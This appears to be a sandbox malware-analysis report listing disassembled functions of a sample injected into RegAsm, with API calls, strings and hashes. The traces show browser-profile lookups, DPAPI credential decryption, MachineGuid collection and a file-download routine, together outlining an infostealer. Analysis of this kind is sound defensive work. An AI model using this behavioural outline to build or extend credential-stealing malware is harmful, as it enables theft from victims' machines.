Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3807055897-1526165396
Opcode ID: a866affe16ca8e922a6408cb586b1a7b70dcbf5fd6ac28e6a64d0ab723cbef12
Instruction ID: b57b41276dec6ca26a492a55ca436f5119a4da988d603043a531c09c6e19b168
Opcode Fuzzy Hash: a866affe16ca8e922a6408cb586b1a7b70dcbf5fd6ac28e6a64d0ab723cbef12
Instruction Fuzzy Hash: 3F41B571904245AACB10EFB5C95ABED77B8AF15308F10415FF80663282DF7C5BC9CA69

Function 0040F98A Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 373COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F98F
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040F9D3
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040FA47
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040FB63

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 0040E080: _EH_prolog.MSVCRT ref: 0040E085

Part of subcall function 0040C544: _EH_prolog.MSVCRT ref: 0040C549

StrCmpCA.SHLWAPI(00000000), ref: 0040FC32
StrCmpCA.SHLWAPI(00000000), ref: 0040FCA7
StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040FDC2

Strings

firefox, xrefs: 0040FDB4
Stable\, xrefs: 0040FCEA
Stable\, xrefs: 0040FA8A

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 2120869262-2697854757
Opcode ID: dbf7b908a87ac3e2687f47c1c06b3d77baf1e4153857911e011d968a29ae6439
Instruction ID: 2d686f351f12e73225fc6c8ac9022cb08154d13c496b9ff0c214c421e4a13293
Opcode Fuzzy Hash: dbf7b908a87ac3e2687f47c1c06b3d77baf1e4153857911e011d968a29ae6439
Instruction Fuzzy Hash: 9EE1A471D00248AADF10EBB9D946BDD7FB4AF15304F50805EE854A72C2DBB85788CBA6

Function 00404DCA Relevance: 15.1, APIs: 10, Instructions: 116networkfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00404DCF

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
StrCmpCA.SHLWAPI(?), ref: 00404E38
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
InternetCloseHandle.WININET(00000000), ref: 00404EE9
InternetCloseHandle.WININET(?), ref: 00404EF2

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2737972104-0
Opcode ID: 58fd7c8425cd75db9ef55b366ba41277c8add291d519841efbba3146873fab0c
Instruction ID: 40f2a40c1b145a76db93a13b23b7e4ef2072ce215efde77c980a902296a0f081
Opcode Fuzzy Hash: 58fd7c8425cd75db9ef55b366ba41277c8add291d519841efbba3146873fab0c
Instruction Fuzzy Hash: D3417CB1900109AFDB10EFA0DD85EEF7B7DFB06344F10402AF611E61A1DB385A85CBA4

Function 00406CC8 Relevance: 10.6, APIs: 7, Instructions: 70filememoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00406CCD
CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D53
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
String ID:
API String ID: 3869837436-0
Opcode ID: 174411ba258b1a29d43bc86467ee122807ef5a1b6d4641874f2b7c6b02b5fb05
Instruction ID: b9358723902a14ac63eee70e7098df6ba5ec4b78117a06a8e82214e953c2bb32
Opcode Fuzzy Hash: 174411ba258b1a29d43bc86467ee122807ef5a1b6d4641874f2b7c6b02b5fb05
Instruction Fuzzy Hash: 57216274A00105EBDB21AF64DC49AAFBB7AEF46750F10052AF512E62A0D7349D91CB54

Function 004111FD Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411223
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004275CB,?,?,00000000), ref: 0041123F
RegQueryValueExA.KERNEL32(004275CB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0041125E
CharToOemA.USER32(?,?), ref: 0041127B

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00411235
MachineGuid, xrefs: 00411256

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValuememset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 1728412123-1211650757
Opcode ID: 1aad6db4980826362cbf698b7aaf78977adb6fc9db8169ce01a2533db0b13e86
Instruction ID: ae0fef36a3430a2a3548cf371294cce895aeefb830ee84e82f567c5d5b1294d0
Opcode Fuzzy Hash: 1aad6db4980826362cbf698b7aaf78977adb6fc9db8169ce01a2533db0b13e86
Instruction Fuzzy Hash: 2A01447590421DFFDB10DBA0DC85EEAB77DDB14704F1000A2B654E1051EB745FC89B60

Function 00410D69 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784), ref: 00410D77
HeapAlloc.KERNEL32(00000000), ref: 00410D7E
GlobalMemoryStatusEx.KERNEL32 ref: 00410D9E
wsprintfA.USER32 ref: 00410DC4

Strings

%d MB, xrefs: 00410DBE
@, xrefs: 00410D97

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 3644086013-3474575989
Opcode ID: e74134ef69fcbf62df99f2c8c471d1dcb5f42ba18690647747baa5289bd01d98
Instruction ID: 29db27eb239e43eec5d646d2985c61976423ee968cafef2e50cc3a271c3c9b51
Opcode Fuzzy Hash: e74134ef69fcbf62df99f2c8c471d1dcb5f42ba18690647747baa5289bd01d98
Instruction Fuzzy Hash: 6AF036B5640208ABEB549BA4DD4AFFE76BDE746705F400119F702E6280D6B4D8818765

Function 00418707 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004187E7: LoadLibraryA.KERNEL32(kernel32.dll,00418719), ref: 004187EC
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418831
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418848
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 0041885F
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418876
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 0041888D
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004188A4
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004188BB
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004188D2
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004188E9
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418900
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418917
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 0041892E
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418945
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 0041895C
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418973
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 0041898A
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004189A1
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004189B8
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004189CF
Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004189E6
Part of subcall function 004187E7: LoadLibraryA.KERNEL32 ref: 004189F7
Part of subcall function 004187E7: LoadLibraryA.KERNEL32 ref: 00418A08

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 004109B3: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041872B,00427716), ref: 004109BF
Part of subcall function 004109B3: HeapAlloc.KERNEL32(00000000,?,?,?,0041872B,00427716), ref: 004109C6
Part of subcall function 004109B3: GetUserNameA.ADVAPI32(00000000,?), ref: 004109DA

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

CloseHandle.KERNEL32(00000000), ref: 0041878C
Sleep.KERNEL32(00001B58), ref: 00418797
OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00427BD8,?,00000000,00427716), ref: 004187A8
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004187BE
CloseHandle.KERNEL32(00000000), ref: 004187CC
ExitProcess.KERNEL32 ref: 004187D3

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
String ID:
API String ID: 1043047581-0
Opcode ID: 862fcf18d219fb9448034a3d665a21da5d7b2c91ea51c00c9a53b4828f39b91b
Instruction ID: 48c5ba8a0da5fd7325b375cbeb95d780a710e0db7ac07b6a2c168a973bc42153
Opcode Fuzzy Hash: 862fcf18d219fb9448034a3d665a21da5d7b2c91ea51c00c9a53b4828f39b91b
Instruction Fuzzy Hash: A11187318000097BDB04FBB2DD5ACFF773D9E56704710412EF512A2092EF781AC4CA99

Function 00403A54 Relevance: 9.1, APIs: 6, Instructions: 56stringnetworkCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00403A59
??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
??_U@YAPAXI@Z.MSVCRT ref: 00403A94
??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackH_prologInternetlstrlen
String ID:
API String ID: 503950642-0
Opcode ID: 62280c25053302a684128e35aba3da1053fbe98ea1aabcc8c3b698535d3cb86e
Instruction ID: 3ef59998d37e527097109bce99900f70a6ef1eba41ca0b8ccb836b66ad9858aa
Opcode Fuzzy Hash: 62280c25053302a684128e35aba3da1053fbe98ea1aabcc8c3b698535d3cb86e
Instruction Fuzzy Hash: D1113D72D00209ABDB14EFA4D849ADE7F78AF15324F20422BF425E72E1DB785B85CB54

Function 00407025 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153libraryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040702A

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00426BF0,?,?,?,00426BEB,?), ref: 004070E7

Part of subcall function 0041077F: lstrlenA.KERNEL32(?,00000000,?,00417DE8,0042770E,0042770B,00000000,00000000,?,004187CB), ref: 00410788
Part of subcall function 0041077F: lstrcpy.KERNEL32(00000000,00000000), ref: 004107BC

SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00426BF4,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00426BEF), ref: 0040715F
LoadLibraryA.KERNEL32(00000000), ref: 0040717A

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004070DB, 004070E0, 004070FA

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 757424748-4027016359
Opcode ID: 58c1ca1d2e81f216f74bc22b2fe966d1ca671b8a7874bb5cddaf12cf1e7ad9ff
Instruction ID: 6c19830b9fca59106c9adf72037baeef59eb1e67f48cdb7736ee12230680947a
Opcode Fuzzy Hash: 58c1ca1d2e81f216f74bc22b2fe966d1ca671b8a7874bb5cddaf12cf1e7ad9ff
Instruction Fuzzy Hash: 7361B770805158EFDB05EBA4DD26AED7BB6AF15304F00506EF401731E1DB781A98DFA9

Function 0040CE0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040CE11

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 00411B55: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413F3B,00000000,00000000), ref: 00411B6E

StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040CE64

Part of subcall function 00406D7F: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406D9F
Part of subcall function 00406D7F: LocalAlloc.KERNEL32(00000040,6d@,?,?,00406436,00000000,?,?), ref: 00406DAD
Part of subcall function 00406D7F: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406DC3
Part of subcall function 00406D7F: LocalFree.KERNEL32(00000000,?,?,00406436,00000000,?,?), ref: 00406DD2

memcmp.MSVCRT ref: 0040CEA2

Part of subcall function 00406DE2: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406E05
Part of subcall function 00406DE2: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406E1D
Part of subcall function 00406DE2: LocalFree.KERNEL32(?), ref: 00406E3B

Strings

, xrefs: 0040CECD
DPAPI, xrefs: 0040CE9C

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2477620391-1819349886
Opcode ID: f4f33cf624ca5c3cd2a6191000c0f4e6aa56049a1103b767f7d3402382def4da
Instruction ID: 2408ed6a17376ed8d3b34ee28a4932b2b5ecf51035a2e12722a0eb3b94b4bde0
Opcode Fuzzy Hash: f4f33cf624ca5c3cd2a6191000c0f4e6aa56049a1103b767f7d3402382def4da
Instruction Fuzzy Hash: B8216D72900119EBCF11EBA5CC469EFBB79EF44314F14022BF911F21D1E7399A5486A9

